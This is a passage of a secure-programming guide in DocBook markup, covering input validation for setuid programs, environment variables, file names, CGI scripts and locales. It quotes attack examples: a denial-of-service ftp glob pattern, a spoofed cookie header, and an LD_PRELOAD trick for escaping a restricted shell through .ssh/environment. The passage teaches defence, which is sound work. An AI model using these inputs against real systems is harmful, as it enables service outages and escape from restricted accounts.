race conditions, and other issues that the rest of this book describes.
The user and administrator guidance documents should be examined to
ensure that misleading, unreasonable, or conflicting guidance is
removed, and that secrity procedures for all modes of operation
have been addressed.
Specialized systems may need to worry about covert channels;
read the CC if you wish to learn more about covert channels.
</para></listitem>
<listitem><para>
Maintenance of assurance (AMA).
If you're not going through a CC evaluation, you don't need a formal
AMA process, but all software undergoes change.
What is your process to give all your users strong confidence that future
changes to your software will not create new vulnerabilities?
For example, you could
establish a process where multiple people review any proposed changes.
</para></listitem>
</itemizedlist>
</para>
</sect1>
</chapter>

<chapter id="input">
<title>Validate All Input</title>

<epigraph>
<attribution>Proverbs 2:12 (NIV)</attribution>
<para>
Wisdom will save you from the ways of wicked men,
from men whose words are perverse...
</para>
</epigraph>

<para>
Some inputs are from untrustable users, so those inputs must be validated
(filtered) before being used.
You should determine what is legal and reject anything that does
not match that definition.
Do not do the reverse (identify what is illegal and write code to
reject those cases),
because you are likely to forget to handle an important case of illegal input.
</para>

<para>
There is a good reason for identifying ``illegal'' values, though, and that's
as a set of tests (usually just executed in your head)
to be sure that your validation code is thorough.
When I set up an input filter,
I mentally attack the filter to see if there are
illegal values that could get through.
Depending on the input, here are a few examples of common ``illegal'' values
that your input filters may need to prevent:
the empty string,
".", "..", "../", anything starting with "/" or ".",
anything with "/" or "&amp;" inside it, any control characters (especially NIL
and newline), and/or
any characters with the ``high bit'' set (especially
values decimal 254 and 255, and character 133 is the Unicode Next-of-line
character used by OS/390).
Again, your code should not be checking for ``bad'' values; you should do
this check mentally to be sure that your pattern ruthlessly limits input
values to legal values.
If your pattern isn't sufficiently narrow, you need to carefully
re-examine the pattern to see if there are other problems.
</para>

<para>
Limit the maximum character length (and minimum length if appropriate),
and be sure to not lose control when such lengths are exceeded
(see <xref linkend="buffer-overflow"> for more about buffer overflows).
</para>

<para>
Here are a few common data types, and things you should validate
before using them from an untrusted user:
<itemizedlist>
<listitem><para>
For strings, identify the legal characters or legal patterns
(e.g., as a regular expression) and reject anything not matching that form.
There are special problems when strings contain control characters
(especially linefeed or NIL) or metacharacters (especially shell
metacharacters); it is often
best to ``escape'' such metacharacters immediately when the input is received so
that such characters are not accidentally sent.
CERT goes further and recommends escaping all characters
that aren't in a list of characters not needing escaping [CERT 1998, CMU 1998].
See <xref linkend="handle-metacharacters">
for more information on metacharacters.
Note that
<ulink url="http://www.w3.org/TR/2001/NOTE-newline-20010314">
line ending encodings vary on different computers</ulink>:
Unix-based systems use character 0x0a (linefeed),
CP/M and DOS based systems (including Windows) use 0x0d 0x0a
(carriage-return linefeed, and some programs incorrectly reverse the order),
the Apple MacOS uses 0x0d (carriage return), and IBM OS/390 uses
0x85 (0x85) (next line, sometimes called newline).
</para></listitem>

<listitem><para>
Limit all numbers to the minimum (often zero) and maximum allowed values.
</para></listitem>

<listitem><para>
A full email address checker is actually quite complicated, because there
are legacy formats that greatly complicate validation if you need
to support all of them; see mailaddr(7) and IETF RFC 822 [RFC 822]
for more information if such checking is necessary.
Friedl [1997] developed a regular expression to check if
an email address is valid (according to the specification);
his ``short'' regular expression is 4,724 characters,
and his ``optimized'' expression (in appendix B) is 6,598 characters long.
And even that regular expression isn't perfect; it can't recognize local
email addresses, and it can't handle nested parentheses in comments
(as the specification permits).
Often you can simplify and only permit the ``common'' Internet
address formats.
</para></listitem>

<listitem><para>
Filenames should be checked; see
<xref linkend="file-names"> for more information on filenames.
</para></listitem>

<listitem><para>
URIs (including URLs) should be checked for validity.
If you are directly acting on a URI (i.e., you're implementing a web
server or web-server-like program and the URL is a request for your data),
make sure the URI is valid, and be especially careful of URIs that
try to ``escape'' the document root (the area of the filesystem
that the server is responding to).
The most common ways to escape the document root are via ``..'' or
a symbolic link, so most servers check any ``..'' directories themselves
and ignore symbolic links unless specially directed.
Also remember to decode any encoding first (via URL encoding or
UTF-8 encoding), or an encoded ``..'' could slip through.
URIs aren't supposed to even include UTF-8 encoding, so the safest thing
is to reject any URIs that include characters with high bits set.
</para>
<para>
If you are implementing a system that uses the URI/URL as data,
you're not home-free at all; you need to ensure that malicious users
can't insert URIs that will harm other users.
See <xref linkend="Validating-uris">
for more information about this.
</para></listitem>

<listitem><para>
When accepting cookie values, make sure to check the domain value
for any cookie you're using
is the expected one.  Otherwise, a (possibly cracked) related site
might be able to insert spoofed cookies.
Here's an example from IETF RFC 2965 of how failing to do this check could
cause a problem:
<itemizedlist>
<listitem><para>
         User agent makes request to victim.cracker.edu, gets back
         cookie session_id="1234" and sets the default domain
         victim.cracker.edu.
</para></listitem>
<listitem><para>
         User agent makes request to spoof.cracker.edu, gets back cookie
         session-id="1111", with Domain=".cracker.edu".
</para></listitem>
<listitem><para>
         User agent makes request to victim.cracker.edu again, and passes:
<programlisting>
         Cookie: $Version="1"; session_id="1234",
                 $Version="1"; session_id="1111"; $Domain=".cracker.edu"
</programlisting>
         The server at victim.cracker.edu should detect that the second
         cookie was not one it originated by noticing that the Domain
         attribute is not for itself and ignore it.
</para></listitem>
</itemizedlist>
</para></listitem>
</itemizedlist>
</para>


<para>
Unless you account for them,
the legal character patterns must not include characters
or character sequences that have special meaning to either
the program internals or the eventual output:
<itemizedlist>
<listitem><para>
A character sequence may have special meaning to the program's internal
storage format.
For example, if you store data (internally or externally) in delimited
strings, make sure that the delimiters are not permitted data values.
A number of programs
store data in comma (,) or colon (:) delimited text files;
inserting the delimiters
in the input can be a problem unless the program accounts for it (i.e.,
by preventing it or encoding it in some way).
Other characters often causing these problems include single and double quotes
(used for surrounding strings)
and the less-than sign "&lt;"
(used in SGML, XML, and HTML to indicate a tag's beginning; this is important
if you store data in these formats).
Most data formats have an escape sequence to handle these cases; use it,
or filter such data on input.
</para></listitem>
<listitem><para>
A character sequence may have special meaning if sent back out to a user.
A common example of this is permitting HTML tags in data input that will later
be posted to other readers (e.g., in a guestbook or ``reader comment'' area).
However, the problem is much more general.
See <xref linkend="cross-site-malicious-content"> for a general discussion
on the topic, and see <xref linkend="filter-html"> for a specific discussion
about filtering HTML.
</para></listitem>
</itemizedlist>
</para>

<para>
These tests should usually be centralized in one place so that the
validity tests can be easily examined for correctness later.
</para>

<para>
Make sure that your validity test is actually correct; this is particularly
a problem when checking input that will be used by another program
(such as a filename, email address, or URL).
Often these tests have subtle errors, producing the so-called
``deputy problem'' (where the checking program
makes different assumptions than the program that actually uses the data).
If there's a relevant standard, look at it, but also search to see if
the program has extensions that you need to know about.
</para>

<para>
While parsing user input, it's a good idea to temporarily drop all privileges,
or even create separate processes (with the parser having permanently dropped
privileges, and the other process performing security checks against the
parser requests).
This is especially true if the parsing task is complex (e.g., if you use
a lex-like or yacc-like tool), or if the programming language
doesn't protect against buffer overflows (e.g., C and C++).
See
<xref linkend="minimize-privileges">
for more information on minimizing privileges.
</para>

<para>
When using data for security decisions (e.g., ``let this user in''),
be sure to use trustworthy channels.
For example, on a public Internet, don't just use the machine IP address
or port number as the sole way to authenticate users, because in most
environments this information can be set
by the (potentially malicious) user.
See
<xref linkend="trustworthy-channels"> for more information.
</para>

<para>
The following subsections discuss different kinds of inputs to a program;
note that input includes process state such as environment variables,
umask values, and so on.
Not all inputs are under the control of an untrusted user, so you need
only worry about those inputs that are.
</para>

<sect1 id="command-line">
<title>Command line</title>

<para>
Many programs take input from the command line.
A setuid/setgid program's command line data is provided by
an untrusted user, so a setuid/setgid program must defend itself from
potentially hostile command line values.
Attackers can send just about any kind of data through a command line
(through calls such as the execve(3) call).
Therefore, setuid/setgid programs must completely
validate the command line inputs and
must not trust the name of the program reported by command line argument zero
(an attacker can set it to any value including NULL).
</para>

</sect1>

<sect1 id="environment-variables">
<title>Environment Variables</title>

<para>
By default, environment variables are inherited from a process' parent.
However, when a program executes another program, the calling program
can set the environment variables to arbitrary values.
This is dangerous to setuid/setgid programs, because their invoker can
completely control the environment variables they're given.
Since they are usually inherited, this also applies transitively; a
secure program might call some other program and, without special measures,
would pass potentially dangerous environment variables values on to the
program it calls.
The following subsections discuss environment variables and what to
do with them.
</para>

<sect2 id="env-vars-dangerous">
<title>Some Environment Variables are Dangerous</title>

<para>
Some environment variables are dangerous because
many libraries and programs are controlled by environment
variables in ways that are obscure, subtle, or undocumented.
For example, the IFS variable is used by the <emphasis remap="it">sh</emphasis> and <emphasis remap="it">bash</emphasis>
shell to determine which characters separate command line arguments.
Since the shell is invoked by several low-level calls
(like system(3) and popen(3) in C, or the back-tick operator in Perl),
setting IFS to unusual values can subvert apparently-safe calls.
This behavior is documented in bash and sh, but it's obscure;
many long-time users only know about IFS because of its use in breaking
security, not because it's actually used very often for its intended purpose.
What is worse is that not all environment variables are documented, and
even if they are, those other programs may change and add dangerous
environment variables.
Thus, the only real solution (described below) is to select the ones you
need and throw away the rest.
</para>

</sect2>

<sect2 id="env-storage-dangerous">
<title>Environment Variable Storage Format is Dangerous</title>

<para>
Normally, programs should use the standard access routines to access
environment variables.
For example, in C, you should get values
using getenv(3), set them using the
POSIX standard routine putenv(3) or the BSD extension setenv(3)
and eliminate environment variables using unsetenv(3).
I should note here that setenv(3) is implemented in Linux, too.
</para>

<para>
However, crackers need not be so nice; crackers can directly control the
environment variable data area passed to a program using execve(2).
This permits some nasty attacks, which can only be understood by
understanding how environment variables really work.
In Linux, you can see environ(5) for a summary how about environment variables
really work.
In short, environment variables are internally stored as a pointer to
an array of pointers to characters; this array is stored in order and
terminated by a NULL pointer (so you'll know when the array ends).
The pointers to characters, in turn, each
point to a NIL-terminated string value of the form ``NAME=value''.
This has several implications, for example, environment variable names
can't include the equal sign, and neither the name nor value can have
embedded NIL characters.
However, a more dangerous implication of this format is that it allows
multiple entries with the same variable name, but with different values
(e.g., more than one value for SHELL).
While typical command shells prohibit doing this,
a locally-executing cracker can create such a situation using execve(2).
</para>

<para>
The problem with this storage format (and the way it's set)
is that a program might check one of these values
(to see if it's valid) but actually use a different one.
In Linux,
the GNU glibc libraries try to shield programs from this;
glibc 2.1's implementation of getenv will always get the first matching
entry, setenv and putenv will always set the first matching entry, and
unsetenv will actually unset <emphasis remap="it">all</emphasis> of the matching entries
(congratulations to the GNU glibc implementers for implementing
unsetenv this way!).
However, some programs go directly to the environ variable and iterate
across all environment variables; in this case,
they might use the last matching entry instead of the first one.
As a result, if checks were made against the first matching entry instead,
but the actual value used is the last matching entry,
a cracker can use this fact to circumvent the protection routines.
</para>

</sect2>

<sect2 id="env-var-solution">
<title>The Solution - Extract and Erase</title>

<para>
For secure setuid/setgid programs, the short list of environment variables
needed as input (if any) should be carefully extracted.
Then the entire environment should be erased,
followed by resetting a small set of necessary environment
variables to safe values.
There really isn't a better way if you make any calls to subordinate
programs; there's no practical
method of listing ``all the dangerous values''.
Even if you reviewed the source code of every program you call
directly or indirectly,
someone may add new undocumented environment variables after you
write your code, and one of them may be exploitable.
</para>

<para>
The simple way to erase the environment in C/C++
is by setting the global variable
<emphasis remap="it">environ</emphasis>
to NULL.
The global variable environ is defined in &lt;unistd.h&gt;; C/C++ users will
want to &num;include this header file.
You will need to manipulate this value before spawning threads, but that's
rarely a problem, since you want to do these manipulations very early in
the program's execution (usually before threads are spawned).
</para>

<para>
The global variable environ's definition is defined in various standards; it's
not clear that the official standards condone directly changing its value,
but I'm unaware of any Unix-like system that has trouble
with doing this.
I normally just modify the ``environ'' directly;
manipulating such low-level components is possibly non-portable, but
it assures you that you get a clean (and safe) environment.
In the rare case where you need later access to the entire set of
variables, you could save the ``environ'' variable's value somewhere,
but this is rarely necessary; nearly all programs need only a few values,
and the rest can be dropped.
</para>

<para>
Another way to clear the environment
is to use the undocumented clearenv() function.
The function
clearenv() has an odd history; it was supposed to be defined in POSIX.1, but
somehow never made it into that standard.
However, clearenv() is defined in POSIX.9
(the Fortran 77 bindings to POSIX), so there is a quasi-official status for it.
In Linux,
clearenv() is defined in &lt;stdlib.h&gt;, but before using &num;include
to include it you must make sure that &lowbar;&lowbar;USE&lowbar;MISC is &num;defined.
A somewhat more ``official'' approach is to cause __USE_MISC to be defined
is to first #define either _SVID_SOURCE or _BSD_SOURCE, and then
#include &lt;features.h&gt; -
these are the official feature test macros.
</para>


<para>
One environment value you'll almost certainly re-add is PATH,
the list of directories to search for programs; PATH should
<emphasis remap="it">not</emphasis> include the current directory and usually be something simple like
``/bin:/usr/bin''.
Typically you'll also set
IFS (to its default of `` \t\n'', where space is the first character)
and TZ (timezone).
Linux won't die if you don't supply either IFS or TZ,
but some System V based systems have problems if you don't supply a TZ value,
and it's rumored that some shells need the IFS value set.
In Linux, see environ(5) for a list of common environment variables that you
<emphasis remap="it">might</emphasis> want to set.
</para>

<para>
If you really need user-supplied values, check the values first
(to ensure that the values match a pattern for legal values and that they
are within some reasonable maximum length).
Ideally there would be some standard trusted file in /etc with the
information for ``standard safe environment variable values'',
but at this time there's no standard file defined for this purpose.
For something similar, you might want to examine the PAM module pam&lowbar;env
on those systems which have that module.
If you allow users to set an arbitrary environment variable, then you'll
let them subvert restricted shells (more on that below).
</para>

<!-- I haven't seen ANYONE else discuss this in secure programming
     guidelines, probably because shell isn't the best place to start
     anyway, but may as well mention it. -->

<para>
If you're using a shell as your programming language,
you can use the ``/usr/bin/env'' program with the ``-'' option
(which erases all environment variables of the program being run).
Basically, you call /usr/bin/env, give it the ``-'' option,
follow that with the set of variables and their values you wish to set
(as name=value),
and then follow that with the name of the program to run and its arguments.
You usually want to call the program using the full pathname
(/usr/bin/env) and not just as ``env'', in case a user has created
a dangerous PATH value.
Note that GNU's env also accepts the options
"-i" and "--ignore-environment" as synonyms (they also erase the
environment of the program being started), but these aren't portable to
other versions of env.
</para>

<para>
If you're programming a setuid/setgid program in a language
that doesn't allow you to reset the environment directly,
one approach is to create a ``wrapper'' program.
The wrapper sets the environment program to safe values, and then
calls the other program.
Beware: make sure the wrapper will actually invoke the intended program;
if it's an interpreted program, make sure there's no race condition possible
that would allow the interpreter to load a different program than the one
that was granted the special setuid/setgid privileges.
</para>
</sect2>

<sect2 id="env-var-dontset">
<title>Don't Let Users Set Their Own Environment Variables</title>

<para>
If you allow users to set their own environment variables,
then users will be able to escape out of restricted accounts
(these are accounts that are supposed to only let
the users run certain programs and not work as a general-purpose machine).
This includes letting users write or modify certain files in their home
directory (e.g., like .login),
supporting conventions that load in environment variables from
files under the user's control (e.g., openssh's .ssh/environment file),
or supporting protocols that transfer environment variables
(e.g., the Telnet Environment Option; see CERT Advisory CA-1995-14
for more).
Restricted accounts should never be allowed to modify or add any
file directly contained in their home directory, and instead should be
given only a specific subdirectory that they are allowed to modify
(if they can modify any).
</para>

<para>
ari posted a detailed discussion of this problem on Bugtraq
on June 24, 2002:
<blockquote>
<para>
Given the similarities with certain other security issues, i'm surprised
this hasn't been discussed earlier.  If it has, people simply haven't
paid it enough attention.
</para>
<para>
This problem is not necessarily ssh-specific, though most telnet daemons
that support environment passing should already be configured to remove
dangerous variables due to a similar (and more serious) issue back in
'95 (ref: [1]).  I will give ssh-based examples here.
</para>
<para>
Scenario one:
Let's say admin bob has a host that he wants to give people ftp access
to.  Bob doesn't want anyone to have the ability to actually _log into_
his system, so instead of giving users normal shells, or even no shells,
bob gives them all (say) /usr/sbin/nologin, a program he wrote himself
in C to essentially log the attempt to syslog and exit, effectively
ending the user's session.  As far as most people are concerned, the
user can't do much with this aside from, say, setting up an encrypted
tunnel.
</para>
<para>
The thing is, bob's system uses dynamic libraries (as most do), and
/usr/sbin/nologin is dynamically linked (as most such programs are).  If
a user can set his environment variables (e.g. by uploading a
'.ssh/environment' file) and put some arbitrary file on the system (e.g.
'doevilstuff.so'), he can bypass any functionality of /usr/sbin/nologin
completely via LD_PRELOAD (or another member of the LD_* environment
family).
</para>
<para>
The user can now gain a shell on the system (with his own privileges, of
course, barring any 'UseLogin' issues (ref: [2])), and administrator
bob, if he were aware of what just occurred, would be extremely unhappy.
</para>
<para>
Granted, there are all kinds of interesting ways to (more or less) do
away with this problem.  Bob could just grit his teeth and give the ftp
users a nonexistent shell, or he could statically compile nologin,
assuming his operating system comes with static libraries.  Bob could
also, humorously, make his nologin program setuid and let the standard C
library take care of the situation.  Then, of course, there are also the
ssh-specific access controls such as AllowGroup and AllowUsers.  These
may appease the situation in this scenario, but it does not correct the
problem.
</para>
<para>
... Now, what happens if bob, instead of using /usr/sbin/nologin, wants to
use (for example) some BBS-type interface that he wrote up or
downloaded?  It can be a script written in perl or tcl or python, or it
could be a compiled program; doesn't matter.  Additionally, bob need not
be running an ftp server on this host; instead, perhaps bob uses nfs or
veritas to mount user home directories from a fileserver on his network;
this exact setup is (unfortunately) employed by many bastion hosts,
password management hosts and mail servers---to name a few.  Perhaps bob
runs an ISP, and replaces the user's shell when he doesn't pay.  With
all of these possible (and common) scenarios, bob's going to have a
somewhat more difficult time getting around the problem.
</para>
<para>
... Exploitation of the problem is simple.  The circumvention code would be
compiled into a dynamic library and LD_PRELOAD=/path/to/evil.so should
be placed into ~user/.ssh/environment (a similar environment option may
be appended to public keys in the authohrized_keys file).  If no
dynamically loadable programs are executed, this will have no effect.
</para>
<para>
ISPs and universities (along with similarly affected organizations)
should compile their rejection (or otherwise restricted) binaries
statically (assuming your operating system comes with static libraries)...
</para>
<para>
Ideally, sshd (and all remote access programs that allow user-definable
environments) should strip any environment settings that libc ignores
for setuid programs.
</para>
</blockquote>
</para>
</sect2>
</sect1>

<sect1 id="file-descriptors">
<title>File Descriptors</title>

<para>
A program is passed a set of ``open file descriptors'', that is,
pre-opened files.
A setuid/setgid program must deal with the fact that the user gets to
select what files are open and to what (within their permission limits).
A setuid/setgid program must not assume that opening a new file will always
open into a fixed file descriptor id, or that the open will succeed at all.
It must also not assume that standard input (stdin),
standard output (stdout), and standard error (stderr)
refer to a terminal or are even open.
</para>

<para>
The rationale behind this is easy; since an attacker can open or
close a file descriptor before starting the program,
the attacker could create an unexpected situation.
If the attacker closes the standard output, when the program opens
the next file it will be opened as though it were standard output,
and then it will send all standard output to that file as well.
Some C libraries will automatically open stdin, stdout, and stderr
if they aren't already open (to /dev/null), but this isn't true on
all Unix-like systems.
Also, these libraries can't be completely depended on; for example,
on some systems it's possible to create a race condition
that causes this automatic opening to fail (and still run the program).
<!-- OpenBSD, May 2002; see Bugtraq -->
</para>
</sect1>

<sect1 id="file-names">
<title>File Names</title>
<para>
The names of files can, in certain circumstances, cause serious problems.
This is especially a problem for secure programs that run on computers
with local untrusted users, but this isn't limited to that circumstance.
Remote users may be able to trick a program into creating undesirable
filenames (programs should prevent this, but not all do), or remote
users may have partially penetrated a system and try using this trick
to penetrate the rest of the system.
</para>
<para>
Usually you will want to not include ``..''
(higher directory) as a legal value from an untrusted user, though
that depends on the circumstances.
You might also want to list only the characters you will permit, and
forbidding any filenames that don't match the list.
It's best to prohibit any change in directory, e.g., by not
including ``/'' in the set of legal characters, if you're taking data
from an external user and transforming it into a filename.
</para>

<para>
Often you shouldn't support ``globbing'', that is,
expanding filenames using ``*'', ``?'', ``['' (matching ``]''),
and possibly ``{'' (matching ``}'').
For example, the command ``ls *.png'' does a glob on ``*.png'' to list
all PNG files.
The C fopen(3) command (for example) doesn't do globbing, but the command
shells perform globbing by default, and in C you can request globbing
using (for example) glob(3).
If you don't need globbing, just use the calls that don't do it where
possible (e.g., fopen(3)) and/or disable them
(e.g., escape the globbing characters in a shell).
Be especially careful if you want to permit globbing.
Globbing can be useful, but complex globs can take a great deal of computing
time.
For example, on some ftp servers, performing a few of these requests can
easily cause a denial-of-service of the entire machine:
<programlisting>
ftp&gt; ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
</programlisting>
<!-- http://lwn.net/2001/0322/a/ftpd-dos.php3 -->
Trying to allow globbing, yet limit globbing patterns, is probably futile.
Instead, make sure that any such programs run as a separate process and
use process limits to limit the amount of CPU and other resources
they can consume.
See <xref linkend="minimize-resources"> for more information on this
approach, and see <xref linkend="quotas"> for more information
on how to set these limits.
</para>

<para>
Unix-like systems generally forbid including the NIL character in a filename
(since this marks the end of the name) and the '/' character
(since this is the directory separator).
However, they often permit anything else, which is a problem;
it is easy to write programs that can be subverted by cleverly-created
filenames.
</para>
<para>
Filenames that can especially cause problems include:
<itemizedlist>
<listitem><para>
Filenames with leading dashes (-).
If passed to other programs, this may cause the other programs to
misinterpret the name as option settings.
Ideally, Unix-like systems shouldn't allow these filenames;
they aren't needed and create many unnecessary security problems.
Unfortunately, currently developers have to deal with them.
Thus, whenever calling another program with a filename, insert
``--'' before the filename parameters (to stop option processing, if
the program supports this common request) or modify the filename
(e.g., insert ``./'' in front of the filename to keep the dash from
being the lead character).
</para></listitem>
<listitem><para>
Filenames with control characters.
This especially includes newlines and carriage returns (which are
often confused as argument separators inside shell scripts, or can
split log entries into multiple entries) and the
ESCAPE character (which can interfere with terminal emulators, causing
them to perform undesired actions outside the user's control).
Ideally, Unix-like systems shouldn't allow these filenames either;
they aren't needed and create many unnecessary security problems.
</para></listitem>
<listitem><para>
Filenames with spaces; these can sometimes confuse a shell into being
multiple arguments, with the other arguments causing problems.
Since other operating systems allow spaces in filenames (including
Windows and MacOS), for interoperability's sake this will probably
always be permitted.
Please be careful in dealing with them, e.g., in the shell use
double-quotes around all filename parameters whenever calling another
program.
You might want to forbid leading and trailing spaces at least; these
aren't as visible as when they occur in other places, and can confuse
human users.
</para></listitem>
<listitem><para>
Invalid character encoding.
For example, a program may believe that the filename is UTF-8 encoded,
but it may have an invalidly long UTF-8 encoding.
See <xref linkend="character-encoding-utf8"> for more information.
I'd like to see agreement on the character encoding used for filenames
(e.g., UTF-8), and then have the operating system enforce the encoding
(so that only legal encodings are allowed), but that hasn't happened
at this time.
</para></listitem>
<listitem><para>
Another other character special to internal data formats, such as ``&lt;'',
``;'', quote characters, backslash, and so on.
</para></listitem>
</itemizedlist>
</para>
</sect1>


<sect1 id="file-contents">
<title>File Contents</title>

<para>
If a program takes directions from a file, it must not trust that file
specially unless only a trusted user can control its contents.
Usually this means that an untrusted user must not be able to modify the file,
its directory, or any of its ancestor directories.
Otherwise, the file must be treated as suspect.
</para>

<para>
If the directions in the file are supposed to be from an untrusted user,
then make sure that the inputs from the file are protected as describe
throughout this book.
In particular, check that values match the set of legal values, and that
buffers are not overflowed.
</para>

</sect1>

<sect1 id="web-apps">
<title>Web-Based Application Inputs (Especially CGI Scripts)</title>

<para>
Web-based applications (such as CGI scripts) run on some trusted
server and must get their
input data somehow through the web.
Since the input data generally come from untrusted users,
this input data must be validated.
Indeed, this information may have actually come from an untrusted third
party; see
<xref linkend="cross-site-malicious-content"> for more information.
For example, CGI scripts
are passed this information
through a standard set of environment variables and through standard input.
The rest of this text will specifically discuss CGI, because it's
the most common technique for implementing dynamic web content, but
the general issues are the same for most other dynamic web content techniques.
</para>

<para>
One additional complication is that many CGI inputs are provided in
so-called ``URL-encoded'' format, that is, some values are written in the
format &percnt;HH where HH is the hexadecimal code for that byte.
You or your CGI library must handle these inputs correctly by
URL-decoding the input and then checking
if the resulting byte value is acceptable.
You must correctly handle all values, including problematic
values such as &percnt;00 (NIL) and &percnt;0A (newline).
Don't decode inputs more than once, or input such as ``&percnt;2500''
will be mishandled (the &percnt;25 would be translated to ``&percnt;'', and the resulting
``&percnt;00'' would be erroneously translated to the NIL character).
</para>

<para>
CGI scripts are commonly attacked by including special characters in their
inputs; see the comments above.
</para>

<para>
Another form of data available to web-based applications are ``cookies.''
Again, users can provide arbitrary cookie values, so they cannot
be trusted unless special precautions are taken.
Also, cookies can be used to track users, potentially invading user privacy.
As a result, many users disable cookies, so if possible your web application
should be designed so that it does not require the use of cookies
(but see my later discussion for when you <emphasis>must</emphasis> authenticate
individual users).
I encourage you to avoid or limit the use of persistent cookies
(cookies that last beyond a current session), because they are easily abused.
Indeed, U.S. agencies are currently forbidden to use persistent cookies
except in special circumstances, because of the concern about
invading user privacy; see the
<ulink url="http://cio.gov/files/lewfinal062200.pdf">OMB guidance
in memorandum M-00-13 (June 22, 2000)</ulink>.
<!-- http://cio.gov/files/OMBCookies2.pdf
 http://www.gao.gov/new.items/d01147r.pdf -->
Note that to use cookies, some browsers may insist that you
have a privacy profile (named p3p.xml on the root directory of the server).
</para>

<para>
Some HTML forms include client-side input checking
to prevent some illegal values; these are
typically implemented using Javascript/ECMAscript or Java.
This checking can be helpful for the user, since it can happen ``immediately''
without requiring any network access.
However, this kind of input checking is useless for security, because
attackers can send such ``illegal'' values directly to the web server
without going through the checks.
It's not even hard to subvert this; you don't have to write
a program to send arbitrary data to a web application.
In general, servers must perform all their own input checking
(of form data, cookies, and so on) because
they cannot trust clients to do this securely.
In short, clients are generally not ``trustworthy channels''.
See <xref linkend="trustworthy-channels">
for more information on trustworthy channels.
</para>

<para>
A brief discussion on input validation for those using Microsoft's
Active Server Pages (ASP) is available from
Jerry Connolly at
<ulink url="http://heap.nologin.net/aspsec.html">http://heap.nologin.net/aspsec.html</ulink>
<!-- ???
Jerry Connolly, jerry.connolly@EIRCOM.NET,
has guidelines for secure ASP pages - mentioned on SECPROG, 1 May 2001:
"I have written a small piece on the subject of input validation at:"
http://heap.nologin.net/aspsec.html
-->
</para>


</sect1>

<sect1 id="other-inputs">
<title>Other Inputs</title>

<para>
Programs must ensure that all inputs are controlled; this is particularly
difficult for setuid/setgid programs because they have so many such inputs.
Other inputs programs must consider include the current directory,
signals, memory maps (mmaps), System V IPC, pending timers,
resource limits, the scheduling priority, and the umask (which determines
the default permissions of newly-created files).
Consider explicitly changing directories (using chdir(2)) to an appropriately
fully named directory at program startup.
<!--
From Bugtraq:

 Re: trusting user-supplied data (was Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio)
From: wietse@porcupine.org (Wietse Venema)
Date: Wed, 24 Apr 2002 14:17:30 -0400 (EDT)
To: bugtraq@securityfocus.com

It is interesting to see that old problems with set-uid commands
keep coming back. Allow me to speed up the discussion a bit by
enumerating a few other channels for attack on set-uid commands.

A quick perusal of /usr/include/sys/proc.h reveals a large number
of "inputs" that a child process may inherit from a potentially
untrusted parent process.

The list includes, but is not limited to:

    command-line array
    environment array
    open files
    current directory
    blocked/enabled signals
    pending timers
    resource limits
    scheduling priority
All these sources of data can be, and have been, involved in attacks
on set-uid or set-gid commands (although I do not remember specific
details of pending timer attacks).

In addition to these "inheritance" attacks which are specific to
set-uid and set-gid commands, set-uid and set-gid commands can be
exposed to attacks via the /proc interface, and can be exposed to
ordinary data-driven attacks by feeding them nasty inputs.

Thus, set-uid and set-gid commands are exposed to a lot more attack
types than your average network service.  The reason that network
attacks get more attention is simply that are more opportunities
to exploit them.

	Wietse

-->
</para>

</sect1>

<sect1 id="locale">
<title>Human Language (Locale) Selection</title>

<para>
As more people have computers and the Internet available to them, there
has been increasing pressure for programs
to support multiple human languages and cultures.
This combination of language and other cultural factors is usually called
a ``locale''.
The process of modifying a program so it can support multiple locales
is called ``internationalization'' (i18n), and the process of providing
the information for a particular locale to a program is called
``localization'' (l10n).
</para>

<para>
Overall, internationalization
is a good thing, but this process provides another opportunity
for a security exploit.
Since a potentially untrusted user provides information on the desired
locale, locale selection becomes another input that,
if not properly protected, can be exploited.
</para>

<sect2 id="how-locales-selected">
<title>How Locales are Selected</title>

<para>
In locally-run programs (including setuid/setgid programs),
locale information is provided by an environment
variable.
Thus, like all other environment variables, these values
must be extracted and checked against valid patterns before use.
</para>

<para>
For web applications, this information can be obtained from the web
browser (via the Accept-Language request header).
However, since not all web browsers properly pass this information
(and not all users configure their browsers properly),
this is used less often than you might think.
Often, the language requested in a web browser
is simply passed in as a form value.
Again, these values must be checked for validity before use, as with
any other form value.
</para>

<para>
In either case, locale information is
really just a special case of input discussed in the previous sections.
However, because this input is so rarely considered,
I'm discussing it separately.
In particular,
when combined with format strings (discussed later), user-controlled
strings can permit attackers to force other programs to run
arbitrary instructions,
corrupt data, and do other unfortunate actions.
</para>

</sect2>

<sect2 id="locale-support-mechanisms">
<title>Locale Support Mechanisms</title>

<para>
There are two major library interfaces for supporting locale-selected
messages on Unix-like systems,
one called ``catgets'' and the other called ``gettext''.
In the catgets approach, every string is assigned a unique number, which
is used as an index into a table of messages.
In contrast,
in the gettext approach, a string (usually in English) is used to
look up a table that translates the original string.
catgets(3) is an accepted standard
(via the X/Open Portability Guide, Volume 3 and
Single Unix Specification),
<!-- http://www.opengroup.org/onlinepubs/007908799/xsh/catopen.html -->
so it's possible your program uses it.
The ``gettext'' interface is not an official standard,
(though it was originally a UniForum proposal), but I believe it's the
more widely used interface
(it's used by Sun and essentially all GNU programs).
</para>

<para>
In theory, catgets should be slightly faster, but this is at best
marginal on today's machines, and the bookkeeping effort to keep
unique identifiers valid in catgets() makes the gettext() interface
much easier to use.
I'd suggest using gettext(), just because it's easier to use.
However, don't take my word for it; see GNU's documentation on gettext
(info:gettext#catgets) for a longer and more descriptive comparison.
</para>

<para>
The catgets(3) call (and its associated catopen(3) call)
in particular is vulnerable
to security problems, because the environment variable NLSPATH can be
used to control the filenames used to acquire internationalized messages.
The GNU C library ignores NLSPATH for setuid/setgid programs, which helps,
but that doesn't protect programs running on other implementations, nor
other programs (like CGI scripts) which don't ``appear'' to
require such protection.
</para>

<para>
The widely-used ``gettext'' interface is at least not
vulnerable to a malicious NLSPATH setting to my knowledge.
However, it appears likely to me that malicious settings of
LC_ALL or LC_MESSAGES could cause problems.
Also, if you use gettext's bindtextdomain() routine in its file cat-compat.c,
that does depend on NLSPATH.
</para>
</sect2>

<sect2 id="locale-legal-values">
<title>Legal Values</title>

<para>
For the moment, if you must permit untrusted users to set information on
their desired locales, make sure the provided internationalization information
meets a narrow filter that only permits legitimate locale names.
For user programs (especially setuid/setgid programs), these values
will come in via NLSPATH, LANGUAGE, LANG, the old LINGUAS, LC_ALL, and
the other LC_* values (especially LC_MESSAGES, but also including
